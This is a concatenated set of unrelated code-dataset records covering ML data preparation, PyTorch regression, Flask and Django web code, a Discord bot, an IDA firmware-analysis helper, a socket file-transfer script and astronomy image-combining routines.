all_generated_sizes.append(json.load(f))\n\n X_train_conv_generated = np.asarray(all_generated_images)\n X_train_values_generated = np.asarray(all_generated_sizes)\n all_generated_labels = np.asarray(all_generated_labels)\n\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(all_generated_labels)\n\n # binary encode\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n y_train_generated = onehot_encoder.fit_transform(integer_encoded)\n return y_train_generated, X_train_values_generated, X_train_conv_generated\n\ndef generateData(datastore, ws, generator_dataset_name, generator_folder, components, X_train_conv, X_train_values, y_train):\n train_generator = ImageDataGenerator(rotation_range=360)\n time_to_repeat_generator = 5\n image_generator = train_generator.flow(\n [\n np.repeat(X_train_conv, time_to_repeat_generator, 0),\n np.repeat(X_train_values, time_to_repeat_generator, 0)\n ],\n np.repeat(y_train, time_to_repeat_generator, 0),\n batch_size = 32\n )\n\n for i in range(20):\n generated_data, generated_labels = image_generator.next()\n for j in range(generated_data[1].shape[0]):\n plt.imsave(f\"{generator_folder}/{components[np.argmax(generated_labels[j])]}-{i}-{j}.png\", generated_data[0][j])\n with open(f\"{generator_folder}/{components[np.argmax(generated_labels[j])]}-{i}-{j}--size.json\", \"w\") as f:\n json.dump(generated_data[1][j], f)\n\n datastore.upload(src_dir=generator_folder, target_path='generator_data')\n generator_data = Dataset.File.from_files(\n [\n (datastore, 'generator_data')\n ],\n validate=False\n )\n generator_data.register(\n workspace=ws,\n name=generator_dataset_name,\n description=\"Components of the 't Veer dataset which have been generated and slightly augmented with rotations.\",\n create_new_version=True\n )\n\ndef saveNumpyArrays(folder, 
**arrays):\n for array_name, array in arrays.items():\n np.save(f\"{folder}/{array_name}.npy\", array)\n\n\ndef trainTestSplit(all_labels_np, all_components_np, all_sizes_np):\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(sorted(all_labels_np))\n\n # binary encode\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n\n training_indices = []\n test_indices = []\n for obj in range(0, onehot_encoded.shape[1]):\n obj_indices = np.where(onehot_encoded[:,obj] == 1)[0]\n np.random.shuffle(obj_indices)\n training_samples = math.floor(0.7 * len(obj_indices)) ## Take 70 % training samples.\n training_indices.extend(obj_indices[:training_samples])\n test_indices.extend(obj_indices[training_samples:])\n\n # print(f\"{len(training_indices)} training indices\")\n # print(f\"{len(test_indices)} test indices\")\n\n X_train_conv = all_components_np[training_indices]\n X_train_values = all_sizes_np[training_indices]\n X_test_conv = all_components_np[test_indices]\n X_test_values = all_sizes_np[test_indices]\n\n y_train = onehot_encoded[training_indices]\n y_test = onehot_encoded[test_indices]\n return X_train_conv, X_train_values, X_test_conv, X_test_values, y_train, y_test\n\n\ndef loadInputData(input_dataset_name, ws):\n input_dataset = Dataset.get_by_name(workspace=ws, name=input_dataset_name)\n \n temp_directory = os.path.join(os.environ.get('ROOT_DIR'), f'data/tmp/{input_dataset_name}')\n os.makedirs(temp_directory, exist_ok=True)\n \n moount_context = input_dataset.mount(temp_directory)\n moount_context.start()\n\n components = os.listdir(temp_directory)\n\n all_components = []\n all_labels = []\n all_sizes = []\n for comp in components:\n for img_uri in glob(os.path.join(temp_directory, comp) + \"/*.png\"):\n try:\n size = img_uri.split(\".png\")[-2]\n with open(size + '--size.json', \"r\") as f:\n all_sizes.append(json.load(f))\n img = plt.imread(img_uri)[:,:,:3]\n all_components.append(img)\n all_labels.append(comp)\n except FileNotFoundError:\n pass\n\n all_labels_np = np.array(all_labels)\n all_components_np = np.array(all_components)\n all_sizes_np = np.array(all_sizes)\n\n return all_labels_np, all_components_np, all_sizes_np, components\n\nif __name__ == '__main__':\n main()\n","sub_path":"steps/01_DataPreparing.py","file_name":"01_DataPreparing.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"389832879","text":"\"\"\"\nhttps://towardsdatascience.com/linear-regression-with-pytorch-eb6dedead817\n\"\"\"\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n############################\n## Define hyperparameters ##\n############################\n\n# Training hyperparameters\nlearningRate = 0.01\nepochs = 1000\n\n#####################\n## Create data set ##\n#####################\n\nN = 11\n\nx_values = [i for i in range(N)]\nx_train = np.array(x_values, dtype=np.float32) # (11,)\nx_train = x_train.reshape(-1, 1) # (11,1)\n\ny_values = [2*i + 1 for i in x_values]\ny_train = np.array(y_values, dtype=np.float32)\ny_train = y_train.reshape(-1, 1)\n\n\n###########\n## Model ##\n###########\n\nclass linearRegression(torch.nn.Module):\n def __init__(self, inputDim, outputDim):\n super(linearRegression, self).__init__()\n self.linear = torch.nn.Linear(inputDim, 
outputDim)\n\n def forward(self, x):\n out = self.linear(x)\n return out\n\n# Initialise the model\nmodel = linearRegression(inputDim=1, outputDim=1)\n\n###############\n## Inference ##\n###############\n\n# Mean Squared Error as loss function\ncriterion = torch.nn.MSELoss() \n\n# Stochastic gradient descent\noptimizer = torch.optim.SGD(model.parameters(), lr=learningRate)\n\nfor epoch in range(epochs):\n inputs = Variable(torch.from_numpy(x_train)) # no minibatches\n labels = Variable(torch.from_numpy(y_train))\n\n # Clear gradient buffers at each epoch\n optimizer.zero_grad()\n\n # get output from the model, given the inputs\n outputs = model(inputs)\n\n # get loss for the predicted output\n loss = criterion(outputs, labels)\n print(loss)\n\n # get gradients w.r.t to parameters\n loss.backward()\n\n # update parameters\n optimizer.step()\n\n print('epoch {}, loss {}'.format(epoch, loss.item()))\n\n#################################################\n## Compare to linear regression fit with scipy ##\n#################################################\n\n# Extract weights from the NN model\nparams_nn = list(model.parameters())\nparams_nn = [ x.data.numpy().round(2) for x in params_nn ]\nprint(\"\\nNN parameters:\")\nprint(params_nn)\n\nparams_lr = stats.linregress(x_train[:,0], y_train[:,0])[:2]\nprint(\"\\nLR parameters:\")\nprint(params_lr)\n\n##########\n## Plot ##\n##########\n\n# with torch.no_grad(): # we don't need gradients in the testing phase\n# predicted = model(Variable(torch.from_numpy(x_train))).data.numpy()\n\n# plt.clf()\n# plt.plot(x_train, y_train, 'go', label='True data', alpha=0.5)\n# plt.plot(x_train, predicted, '--', label='Predictions', alpha=0.5)\n# plt.legend(loc='best')\n# plt.show()\n\n","sub_path":"linear_regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"616737728","text":"import json\nfrom flask import Blueprint, render_template, jsonify, request, current_app\nfrom flask_login import current_user\n\nimport db\nfrom utils import database\n\n\nbp = Blueprint(\"home\", __name__)\n\n\n@bp.route(\"/\", methods=[\"GET\"])\ndef home():\n \"\"\"\n Render home page\n\n \"\"\"\n try:\n with open(current_app.config[\"THEME_DIR\"], \"r\") as f:\n data = json.load(f)\n formatted_font = data[\"font_family\"].replace(\" \", \"+\")\n return render_template(\"index.html\", icon=data[\"icon\"], formated_font=formatted_font,\n font_family=data[\"font_family\"], name_font_family=data[\"name_font_family\"])\n except FileNotFoundError as e:\n return jsonify({\"ERROR\": e})\n\n\n@bp.route(\"/theme\", methods=[\"GET\"])\ndef theme():\n \"\"\"\n Returns theme JSON object\n\n Returns (JSON): theme JSON object\n \"\"\"\n try:\n with open(current_app.config[\"THEME_DIR\"], \"r\") as f:\n data = json.load(f)\n return jsonify({\"theme\": data})\n except FileNotFoundError as e:\n return jsonify({\"ERROR\": e})\n\n\n@bp.route(\"/top_k\", methods=[\"GET\"])\ndef top_k():\n \"\"\"\n Returns the top k latest entries in the database\n\n Returns (JSON): a list of top k entries\n\n \"\"\"\n db_conn = db.get_db()\n k = request.args.get(\"k\")\n top_ks = database.get_top_k_entries(db_conn, int(k))\n db_conn.close()\n return jsonify({\"top_k\": top_ks})\n\n\n@bp.route(\"/public_repos\", methods=[\"GET\"])\ndef public_repos():\n \"\"\"\n List all public repos from github\n\n Returns (JSON): a list of repos and updated timestamp\n\n \"\"\"\n 
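# editor's comment: repos are read from the local DB here; presumably a\n    # separate task keeps that table in sync with GitHub\n    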
db_conn = db.get_db()\n if request.method == \"GET\":\n repos, updated = database.get_public_repos(db_conn)\n db_conn.close()\n return jsonify({\"repos\": repos, \"updated\": updated})\n\n\n@bp.route(\"/blogs\", methods=[\"GET\", \"POST\"])\ndef blogs():\n \"\"\"\n GET or POST blogs\n\n Returns (JSON): GET -> a list of all blogs\n POST -> INFO message\n\n \"\"\"\n db_conn = db.get_db()\n if request.method == \"GET\":\n all_blogs, updated = database.get_articles(db_conn)\n db_conn.close()\n return jsonify({\"blogs\": all_blogs, \"updated\": updated})\n if current_user.is_authenticated:\n title = request.json[\"title\"]\n description = request.json[\"description\"]\n url = request.json[\"url\"]\n image_url = request.json[\"image_url\"]\n time_stamp = request.json[\"time_stamp\"] + \" 00:00:00\"\n database.add_entry(\"blogs\", db_conn, title, description, url, image_url, time_stamp)\n db_conn.close()\n return jsonify({\"INFO\": \"Blog added\"})\n return jsonify({\"ERROR\": \"Unauthenticated\"})\n\n\n@bp.route(\"/publications\", methods=[\"GET\", \"POST\"])\ndef publications():\n \"\"\"\n GET or POST publications\n\n Returns (JSON): GET -> a list of all publications\n POST -> INFO message\n\n \"\"\"\n db_conn = db.get_db()\n if request.method == \"GET\":\n all_blogs = database.get_entries(\"publications\", db_conn)\n db_conn.close()\n return jsonify({\"publications\": all_blogs})\n if current_user.is_authenticated:\n title = request.json[\"title\"]\n description = request.json[\"description\"]\n url = request.json[\"url\"]\n image_url = request.json[\"image_url\"]\n time_stamp = request.json[\"time_stamp\"] + \" 00:00:00\"\n database.add_entry(\"publications\", db_conn, title, description, url, image_url, time_stamp)\n db_conn.close()\n return jsonify({\"INFO\": \"Publication added\"})\n return jsonify({\"ERROR\": \"Unauthenticated\"})\n","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"411488003","text":"from .sync import Event\n\n__all__ = ['Promise']\n\n\nclass Promise:\n def __init__(self):\n self._event = Event()\n self._data = None\n self._exception = None\n\n def __repr__(self):\n res = super().__repr__()\n if self.is_set():\n extra = repr(self._exception) if self._exception else repr(self._data)\n else:\n extra = 'unset'\n return '<{} [{}]>'.format(res[1:-1], extra)\n\n def is_set(self):\n '''Return `True` if the promise is set'''\n return self._event.is_set()\n\n def clear(self):\n '''Clear the promise'''\n self._data = None\n self._exception = None\n self._event.clear()\n\n async def set(self, data):\n '''Set the promise. 
Wake all waiting tasks (if any).'''\n self._data = data\n await self._event.set()\n\n async def get(self):\n '''Wait for the promise to be set, and return the data.\n\n If an exception was set, it will be raised.'''\n await self._event.wait()\n\n if self._exception is not None:\n raise self._exception\n\n return self._data\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc, tb):\n if exc_type is not None:\n self._exception = exc\n await self._event.set()\n\n return True\n","sub_path":"curio/promise.py","file_name":"promise.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"608184047","text":"from rest_framework.serializers import ModelSerializer\nfrom .models import (Location,\n weather_data\n )\n\nclass LocationSerializer(ModelSerializer):\n class Meta:\n model = Location\n fields = '__all__'\n\nclass WeatherDataSerializer(ModelSerializer):\n location = LocationSerializer(required=True)\n\n class Meta:\n model = weather_data\n fields = '__all__'\n\n def create(self, validated_data):\n loc_data = validated_data.pop('location', None)\n location = Location.objects.create(**loc_data)\n validated_data.update({\"temperature\":\"[\"+validated_data[\"temperature\"]+\"]\"})\n return weather_data.objects.create(location=location, **validated_data)\n\n\n def update(self, instance, validated_data):\n loc_dict = validated_data.pop('location', None)\n if loc_dict:\n loc_obj = instance.location\n for key, value in loc_dict.iteritems():\n setattr(loc_obj, key, value)\n loc_obj.save()\n validated_data[\"location\"] = loc_obj\n for key, value in validated_data.iteritems():\n setattr(instance, key, value)\n instance.save()\n return instance","sub_path":"Weather_API/src/weather_API/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"212569763","text":"# @Time : 2019/5/28 16:33\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List\n\n\nclass Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cnt_zero = cnt_one = cnt_two = 0\n for num in nums:\n if num == 0:\n cnt_zero += 1\n elif num == 1:\n cnt_one += 1\n else:\n cnt_two += 1\n nums[:cnt_zero] = [0] * cnt_zero\n nums[cnt_zero:cnt_zero + cnt_one] = [1] * cnt_one\n nums[cnt_zero + cnt_one:] = [2] * cnt_two\n\n def sortColors1(self, nums: List[int]) -> None:\n j = 0\n for i in range(len(nums)):\n if nums[i] < 2:\n nums[i], nums[j] = nums[j], nums[i]\n j += 1\n k = 0\n for i in range(j):\n if nums[i] < 1:\n nums[i], nums[k] = nums[k], nums[i]\n k += 1\n\n def sortColors2(self, nums: List[int]) -> None:\n cur, low, high = 0, 0, len(nums) - 1\n while cur <= high:\n if nums[cur] == 0:\n nums[cur], nums[low] = nums[low], nums[cur]\n low += 1\n cur += 1\n elif nums[cur] == 2:\n nums[cur], nums[high] = nums[high], nums[cur]\n high -= 1\n else:\n cur += 1\n\n\nif __name__ == '__main__':\n s = Solution()\n nums = [2, 0, 2, 1, 1, 0, 2]\n print(s.sortColors2(nums))\n print(nums)\n","sub_path":"sortColors.py","file_name":"sortColors.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"20426896","text":"from django import forms\n\n\nclass PreguntaCinco(forms.Form):\n RESPUESTA_PREGUNTA_CINCO 
= (\n        ('a', 'a. 10.000'),\n        ('b', 'b. 7.600'),\n        ('c', 'c. 2.500'),\n        ('d', 'd. 8.000'),\n    )\n\n    respuesta = forms.TypedChoiceField(\n        # label='pruebas',\n        choices=RESPUESTA_PREGUNTA_CINCO,\n        widget=forms.RadioSelect(attrs={\n            'class': 'custom-control-indicator',\n\n        })\n    )\n    fecha_registro_P05 = forms.DateTimeField()","sub_path":"isomaticAppWeb/preguntaCinco.py","file_name":"preguntaCinco.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"526146732","text":"import re\n\nclass ParamCreator(object):\n\t'''\n\tResponsible for creating new parameter files for candidates.\n\t'''\n\tdef __init__(self, referenceFile):\n\t\t'''\n\t\tSets up the creator with:\n\t\t\t- The reference file on which all candidates are based.\n\t\t'''\n\n\t\t# regex for finding the parameter values in XML.\n\t\tself.replacePat = re.compile(r'(<.*>)[0-9]+(<.*>)')\n\t\t\n\t\t# open and read the reference file, storing its lines for fast manipulation later.\n\t\twith open(referenceFile, 'r') as f:\n\t\t\tself.referenceLines = f.readlines()\n\n\tdef createNew(self, candidate, newFile):\n\t\t'''\n\t\tCreates a new parameter file using the reference file specified when the object was created\n\t\tand values from the given candidate.\n\t\t'''\n\t\t\n\t\t# copy the reference list.\n\t\tcandLines = list(self.referenceLines)\n\t\t\n\t\t# loop over the relevant lines in the file and replace the value in each line\n\t\t# with that from the candidate.\n\t\tcandIndex = 0\n\t\tfor i in range(21, 29): # the lines which contain the cell values we're interested in.\n\t\t\tcandLines[i] = re.sub(\n\t\t\t\tself.replacePat, # the pattern to look for.\n\t\t\t\tr'\\g<1>%s\\g<2>' % str(candidate[candIndex]), # what to replace it with once we find it.\n\t\t\t\tcandLines[i]) # the line to look for it in.\n\t\t\t\n\t\t\t# now looking at the next element of the candidate.\n\t\t\tcandIndex += 1\n\t\t\n\t\t# write out the new lines to a new parameter file.\n\t\twith open(newFile, 'w') as f:\n\t\t\tf.writelines(candLines)\n\t\t","sub_path":"py/eae_params.py","file_name":"eae_params.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"365603273","text":"from Utils.CurrencyUtils import CurrencyGuild, CurrencyMessage\nfrom discord import Guild as DGuild\nfrom time import time as epoch\n\n\nclass CurrencyCommand:\n\t\n\tconversion = {\n\t\t\"y\": 31449600, # year to second multiplier,\n\t\t# defined as 52 weeks\n\t\t\"w\": 604800, # week to second multiplier\n\t\t\"d\": 86400, # day to second multiplier\n\t\t\"h\": 3600, # hour to second multiplier\n\t\t\"m\": 60, # minute to second multiplier\n\t\t\"s\": 1\n\t}\n\t\n\tdef __init__(self, client):\n\t\tself.client = client\n\t\t\n\tdef new_guild(self, guild):\n\t\tif isinstance(guild, DGuild):\n\t\t\treturn CurrencyGuild(self.client, guild)\n\t\t\n\t\tg = self.client.get_guild(guild)\n\t\n\t\tif g:\n\t\t\treturn CurrencyGuild(self.client, g)\n\t\n\tasync def run(self, cmd, message, *args):\n\t\tmessage = CurrencyMessage(self.client, message)\n\n\t\tawait self.currency_run(cmd, message, *args)\n\t\n\tasync def currency_run(self, *args):\n\t\tpass\n\t\n\tdef time_formatter(self, time):\n\t\tif isinstance(time, float):\n\t\t\ttime = time.__round__()\n\t\t\n\t\ttimes = [\"year\", \"week\", \"day\", \"hour\", \"minute\", \"second\"]\n\t\ttime_string = \"\"\n\t\tfor t in times:\n\t\t\tmultiplier = 
self.conversion[t[0]]\n\t\t\tcurrent_time = time // multiplier\n\t\t\ttime = time % multiplier\n\t\t\t\n\t\t\tif current_time > 0:\n\t\t\t\tplural = \"s \" if current_time > 1 else \" \"\n\t\t\t\ttime_string += str(current_time) + \" \"\n\t\t\t\ttime_string += t + plural\n\t\t\n\t\treturn time_string.strip()\n\n\ndef gambling_suspended(f):\n\tasync def arg_handler(self, cmd, message, *args):\n\t\tif message.author.is_gambling_suspended:\n\t\t\tawait self.client.errors.GamblingSuspended().send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\treturn\n\t\treturn await f(self, cmd, message, *args)\n\treturn arg_handler\n\n\ndef command_cooldown(name):\n\tdef decorator(f):\n\t\tasync def arg_handler(self, cmd, message, *args):\n\t\t\tin_cooldown = (\n\t\t\t\tself.client\n\t\t\t\t.cooldown_manager\n\t\t\t\t.in_cooldown(\n\t\t\t\t\tname,\n\t\t\t\t\t(message.author.id, message.guild.id,)\n\t\t\t\t)\n\t\t\t)\n\t\t\t\n\t\t\tif in_cooldown:\n\t\t\t\treturn await self.client.errors.InCooldown(\n\t\t\t\t\tself.time_formatter(\n\t\t\t\t\t\tself.client.cooldown_manager.get_cooldown(\n\t\t\t\t\t\t\tname,\n\t\t\t\t\t\t\t(message.author.id, message.guild.id,),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t).send(message.channel)\n\t\t\t\n\t\t\tself.client.cooldown_manager.add(\n\t\t\t\tname,\n\t\t\t\t(message.author.id, message.guild.id,),\n\t\t\t\tgetattr(self, \"cooldown\", 0) + epoch()\n\t\t\t)\n\t\t\t\n\t\t\treturn await f(self, cmd, message, *args)\n\t\treturn arg_handler\n\treturn decorator\n","sub_path":"Utils/CurrencyCommand.py","file_name":"CurrencyCommand.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"386989856","text":"from ida_search import *\nfrom idautils import *\nfrom idc import *\n\nSROM = 0\nIBOT = 1\nSEP = 2\n\nsegmbitness = None\nfiletype = None\nbuildtype = None\nibootversion = None\nissep = None\n\n\ndef bad(ea):\n return ea == BADADDR\n\n\ndef is64(segm):\n return segm.bitness == 2\n\n\ndef find_probable_string_start(segm):\n # The initial run of this function is before any analysis or segmentation starts.\n #\n # functions = list(Functions())\n\n prologue = \"6E 6F 72 30 00\"\n\n # if string_addr < functions[len(functions)-1]:\n if filetype == SROM:\n prologue = \"6E 6F 72 30 00\"\n\n string_addr = find_binary(segm.end_ea, segm.start_ea, prologue, 16, SEARCH_UP)\n\n return string_addr\n","sub_path":"iBootStrap/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"44547620","text":"import socket # Import socket module\nimport select\n\n\nport = 60004 # Reserve a port for your service.\nconnexion_principale = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object\nhost = input(\"Quel est ton ip?\")\t\t\t\t # Get local machine name\nconnexion_principale.bind((host, port)) # Bind to the port\nconnexion_principale.listen(5) # Now wait for client connection.\n\n\nprint('Server listening....')\nconnexion_avec_client, infos_connexion = connexion_principale.accept() # Establish connection with client.\nprint('Got connection from', infos_connexion)\nfilename=input('chemin du fichier : ') #Select the right fie\nmsg_send2 = \"Envoi du fichier\"\nconnexion_avec_client.send(msg_send2.encode())\nmsg_received2 = connexion_avec_client.recv(1024) #Wait for opened file on client file\nmsg_received2 = msg_received2.decode()\nif msg_received2 == \"file opened\":\n\tmsg_send3 = 
\"Go\" #Send the file \n\tconnexion_avec_client.send(msg_send3.encode())\n\tf = open(filename,'rb') #Open the file in reading mode\n\tl = f.read(1024)\n\twhile (l):\n\t\tconnexion_avec_client.send(l)\n\t\tprint('Sent ',repr(l))\n\t\tl = f.read(1024)\n\tmsg_received3 = connexion_avec_client.recv(1024) #Wait for the file to be successfully received\n\tmsg_received3 = msg_received3.decode()\n\tprint (msg_received3)\n\tf.close() #close the file \n\tprint('Done sending')\n\tconnexion_avec_client.close()#close the connection\n\tFalse\n\n\n\n","sub_path":"old/server_file.py","file_name":"server_file.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"354072352","text":"import sys\nN = int(sys.stdin.readline())\nstack = []\nstack_len = 0\n\nwhile N > 0:\n Input = sys.stdin.readline()\n N -= 1\n\n if 'push' in Input:\n stack_len += 1\n stack += [int(Input[5:])]\n\n elif 'pop' in Input:\n if stack:\n print(stack[-1])\n stack.pop()\n stack_len -= 1\n else:\n print(-1)\n\n elif 'size' in Input:\n print(stack_len)\n\n elif 'empty' in Input:\n if stack:\n print(0)\n else:\n print(1)\n\n else:\n if stack:\n print(stack[-1])\n else:\n print(-1)","sub_path":"A/S/200309/BJ10828스택_s.py","file_name":"BJ10828스택_s.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"600308365","text":"import os\nimport image_registration\nfrom image_registration.fft_tools.zoom import zoom_on_pixel\nfrom FITS_tools.cube_regrid import regrid_fits_cube,regrid_cube_hdu\nfrom FITS_tools.hcongrid import hcongrid,hcongrid_hdu\nimport FITS_tools\nimport fft_psd_tools\nimport spectral_cube.io.fits\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom astropy import coordinates\nfrom astropy import units as u\nfrom astropy import log\nfrom astropy.utils.console import ProgressBar\nfrom itertools import izip\nimport numpy as np\n\ndef file_in(filename, extnum=0):\n \"\"\"\n Take the input files. If input is already HDU, then return it.\n If input is a .fits filename, then read the .fits file. \n\n Return\n ----------\n hdu : obj \n An object containing both the image and the header\n im : (float point?) array\n The image array\n header : header object\n The header of the input .fits file\n\n Parameters\n ----------\n filename : str\n The input .fits filename or a HDU variable name\n extnum : int\n The extension number to use from the input .fits file\n \"\"\"\n if isinstance(filename, (fits.ImageHDU, fits.PrimaryHDU) ):\n hdu = filename\n else:\n hdu = fits.open(filename)[extnum]\n \n im = hdu.data.squeeze()\n header = FITS_tools.strip_headers.flatten_header(hdu.header)\n\n return hdu, im, header\n\n\n\ndef flux_unit(image, header):\n \"\"\"\n Convert all possible units to un-ambiguous unit like Jy/pixel or Jy/arcsec^2.\n\n Parameter/Return\n ----------------\n image : (float point?) array\n The input image with arbitrary flux unit (e.g. Jy/beam). 
\n    Get converted to Jy/arcsec^2 units in output.\n    header : header object \n        Header of the input/output image\n    \"\"\"\n\n    return image, header\n\n\n\ndef regrid(hd1,im1,im2raw,hd2):\n    \"\"\"\n    Regrid the low resolution image to have the same dimensions and pixel size as the\n    high resolution image.\n\n    Return\n    ----------\n    hdu2 : An object containing both the image and the header\n        This will contain the regridded low resolution image, and the image header taken\n        from the high resolution observation.\n    im2 : (float point?) array\n        The image array which stores the regridded low resolution image.\n    nax1, nax2 : int(s)\n        Number of pixels in each of the spatial axes.\n    pixscale : float (?)\n        pixel size in the input high resolution image.\n\n    Parameters\n    ----------\n    hd1 : header object\n        The header of the high resolution image\n    im1 : (float point?) array\n        The high resolution image\n    im2raw : (float point?) array\n        The pre-regridded low resolution image\n    hd2 : header object \n        header of the low resolution image\n    \"\"\"\n\n    # Sanity Checks:\n    assert hd2['NAXIS'] == im2raw.ndim == 2, 'Error: Input lores image dimension non-equal to 2.'\n    assert hd1['NAXIS'] == im1.ndim == 2, 'Error: Input hires image dimension non-equal to 2.'\n\n    # read pixel scale from the header of high resolution image\n    pixscale = FITS_tools.header_tools.header_to_platescale(hd1)\n    log.debug('pixscale = {0}'.format(pixscale))\n\n    # read the image array size from the high resolution image\n    nax1,nax2 = (hd1['NAXIS1'],\n                 hd1['NAXIS2'],\n                 )\n\n    # create a new HDU object to store the regridded image\n    hdu2 = fits.PrimaryHDU(data=im2raw, header=hd2)\n\n    # regrid the image\n    hdu2 = hcongrid_hdu(hdu2, hd1)\n    im2 = hdu2.data.squeeze()\n\n    # return variables\n    return hdu2, im2, nax1, nax2, pixscale\n\n\n\ndef pbcorr(fft2, hd1, hd2):\n    \"\"\"\n    Divide the fourier transformed low resolution image by its fourier transformed primary\n    beam, and then multiply by the fourier transformed primary beam of the high resolution image.\n\n    Parameters\n    ----------\n    fft2 : float array \n        Fourier transformed low resolution image\n    hd1 : header object\n        Header of the high resolution image\n    hd2 : header object\n        Header of the low resolution image \n    \n    Return\n    ---------- \n    fft2 : float array\n        Fourier transformed low resolution image, after correcting for the primary beam effect\n    \"\"\"\n\n    return fft2\n\n\n\ndef flux_match(fft1, fft2):\n    \"\"\"\n    Scale the flux level of the high resolution image, based on the flux level of the low\n    resolution image. This is because we probably trust the flux scale from space better,\n    given that it is not affected by the atmospheric effects and the related calibrations. \n    This also maintains consistency if we want to incorporate more bands from the space \n    observatory for science analysis.\n\n    Parameters\n    ----------\n    fft1 : float array \n        Fourier transformed high resolution image\n    fft2 : float array \n        Fourier transformed low resolution image\n\n    Return\n    -----------\n    fft1 : float array \n        Fourier transformed high resolution image after flux rescaling.\n    \"\"\"\n\n    return fft1\n\n\n\ndef feather_kernel(nax2, nax1, lowresfwhm, pixscale):\n    \"\"\"\n    Construct the weight kernels (image arrays) for the fourier transformed low resolution and\n    high resolution images. This routine follows the \"feather algorithm\", e.g.:\n    \n    (***To be detailed.)
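In practice (see the body below and fftmerge): the low resolution\n    transform is weighted by a Gaussian kernel whose FWHM matches the low\n    resolution beam, the high resolution transform by one minus that kernel,\n    and the two weighted transforms are summed.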
\n \n Return\n ----------\n kernel : float array\n An image array containing the weighting for the low resolution image\n kernel1 : float array\n An image array containing the weighting for the high resolution image\n\n Parameters\n ----------\n nax2, nax1 : int\n Number of pixels in each axes. \n lowresfwhm : float\n Angular resolution of the low resolution image (FWHM) \n pixscale : float (?)\n pixel size in the input high resolution image.\n \"\"\"\n # Construct arrays which hold the x and y coordinates (in unit of pixels)\n # of the image\n ygrid,xgrid = (np.indices([nax2,nax1])-np.array([(nax2-1.)/2,(nax1-1.)/2.])[:,None,None])\n\n fwhm = np.sqrt(8*np.log(2))\n # sigma in pixels\n sigma = ((lowresfwhm/fwhm/(pixscale*u.deg)).decompose().value)\n log.debug('sigma = {0}'.format(sigma))\n\n kernel = np.fft.fftshift( np.exp(-(xgrid**2+ygrid**2)/(2*sigma**2)) )\n kernel/=kernel.max()\n kernel1 = 1 - kernel\n\n return kernel,kernel1\n\n\n\ndef fftmerge(kernel1,kernel2,fft1,fft2):\n \"\"\"\n Combine images in the fourier domain, and then output the combined image\n both in fourier domain and the image domain.\n\n Parameters\n ----------\n kernel1,2 : float array\n Weighting images.\n fft1,fft2: float array\n Fourier transformed input images.\n\n Return\n ----------\n fftsum : float array\n Combined image in fourier domain.\n combo : float array\n Combined image in image domain.\n \"\"\"\n\n # Sanity check in case that the two input images does not overlap well\n # in the uv-distance range.\n\n # Combine and inverse fourier transform the images\n fftsum = kernel2*fft2 + kernel1*fft1\n combo = np.fft.ifft2(fftsum)\n\n return fftsum, combo\n\n\n\ndef smoothing(combo, targres):\n \"\"\"\n Smooth the image to the targeted final angular resolution.\n\n Parameters\n ----------\n combo : float array\n Combined image\n targres : float\n The HPBW of the smoothed image (in units of arcsecond)\n \"\"\"\n\n return combo\n\n\n\ndef akb_plot(fft1, fft2, fftsum, outname=\"akb_combine.pdf\"):\n \"\"\"\n Generate plots for examining the combined results in fourier domain.\n\n Parameters\n ----------\n fft1 : float array\n Fourier transformed high resolution image\n fft2 : float array\n Fourier transformed low resolution image\n fftsum : float array\n Fourier transformed combined image\n \"\"\"\n return\n\n\ndef casaheader(header):\n \"\"\"\n Generate the header which is compatible with CASA.\n\n Parameters\n ----------\n header : header object\n The header of the high resolution image.\n\n Return\n combo_header : header object\n The generated CASA compatible header\n \"\"\"\n combo_header = header\n return combo_header\n\n\n\ndef outfits(image, header, outname=\"output.fits\"):\n \"\"\"\n Output .fits format image.\n\n Parameters\n ----------\n image : (float point?) 
